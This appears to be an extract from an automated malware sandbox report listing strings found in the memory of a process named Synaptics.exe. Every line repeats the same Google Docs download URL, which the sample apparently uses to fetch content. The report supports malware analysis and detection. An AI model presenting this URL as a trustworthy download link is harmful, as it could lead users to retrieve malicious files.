                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download11
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1E
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1Q
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1S
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1p
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1u
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000710F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2412
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2kz
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883242733.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D0C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download33
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3:w$
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3lss
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4V~&
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4c
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4d28T6
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5R
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5jw$a
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5s
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5t
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6j~&
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download72
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7Wq
                            Source: Synaptics.exe, 0000001A.00000002.2337627230.000000001B07E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7j
                            Source: Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.0000000007099000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8:
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8~
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9R
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9VC&=
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9Y7$.
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9_STO
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9l
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9v
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:dB$
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=S
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=q
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAP
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAR
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAS
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAS-y8
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAS-yb
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadApK
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAt
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAuK
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBZ5
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC3
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCTX_
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCalif
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadComp
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCr6Xr
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDQ
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000710F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                            Source: Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEBg
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadER
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadES
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEsO$
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEtO#U
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883242733.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D0C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF1
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF:
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFj
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFull
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGV
                            Source: Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.0000000007099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
